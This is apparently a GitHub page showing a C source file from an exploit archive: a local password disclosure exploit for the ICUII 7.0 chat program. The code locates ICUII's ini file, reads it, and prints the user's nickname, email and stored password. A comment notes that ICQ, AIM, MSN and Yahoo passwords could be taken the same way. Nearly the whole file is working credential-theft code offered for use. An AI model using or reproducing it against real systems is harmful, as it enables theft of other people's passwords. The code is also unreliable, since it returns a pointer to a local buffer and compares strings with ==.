forked from hackernix/PacketStorm-Exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathICUII70.c
More file actions
executable file
·143 lines (118 loc) · 2.92 KB
/
Copy pathICUII70.c
File metadata and controls
executable file
·143 lines (118 loc) · 2.92 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
/*****************************************************************
ICUII 7.0 Local Password Disclosure Exploit by Kozan
Application: ICUII 7.0 (and probably prior versions)
Procuder: Cybration - www.icuii.com
Vulnerable Description: ICUII 7.0 discloses passwords to local users.
Discovered & Coded by Kozan
Credits to ATmaCA
www.netmagister.com - www.spyinstructors.com
kozan@netmagister.com
*****************************************************************/
#include <stdio.h>
#include <windows.h>
HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
int adresal(char *FilePath,char *Str)
{
char kr;
int Sayac=0;
int Offset=-1;
FILE *di;
di=fopen(FilePath,"rb");
if( di == NULL )
{
fclose(di);
return -1;
}
while(!feof(di))
{
Sayac++;
for(int i=0;i<strlen(Str);i++)
{
kr=getc(di);
if(kr != Str[i])
{
if( i>0 )
{
fseek(di,Sayac+1,SEEK_SET);
}
break;
}
if( i > ( strlen(Str)-2 ) )
{
Offset = ftell(di)-strlen(Str);
fclose(di);
return Offset;
}
}
}
fclose(di);
return -1;
}
char *oku(char *FilePath,char *Str)
{
FILE *di;
char cr;
int i=0;
char Feature[500];
int Offset = adresal(FilePath,Str);
if( Offset == -1 )
return "";
if( (di=fopen(FilePath,"rb")) == NULL )
return "";
fseek(di,Offset+strlen(Str),SEEK_SET);
while(!feof(di))
{
cr=getc(di);
if(cr == 0x0D)
break;
Feature[i] = cr;
i++;
}
Feature[i] = '\0';
fclose(di);
return Feature;
}
int main()
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey
) == ERROR_SUCCESS)
{
lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,(LPBYTE) prgfiles,
&dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
{
RegCloseKey(hKey);
printf("An error occured!\n");
return -1;
}
RegCloseKey(hKey);
}
strcat(prgfiles,"\\icuii\\icuii.ini");
if(oku(prgfiles,"NickName=")=="")
{
printf("ICUII is not installed on your system!\n");
return -1;
}
printf("ICUII 7.0 Local Password Disclosure Exploit by Kozan\n");
printf("Credits to ATmaCA\n");
printf("www.netmagister.com - www.spyinstructors.com\n");
printf("kozan@netmagister.com\n\n");
printf("Nickname: %s\n",oku(prgfiles,"NickName="));
printf("Location: %s\n",oku(prgfiles,"Location="));
printf("Comment : %s\n",oku(prgfiles,"Comment="));
printf("E-Mail : %s\n",oku(prgfiles,"Email="));
printf("Password: %s\n",oku(prgfiles,"StartingPW="));
/*
This example exploit only shows main ICUII passwords.
You may also get ICQ, AIM, MSN, Yahoo! passwords which are used within ICUII
*/
return 0;
}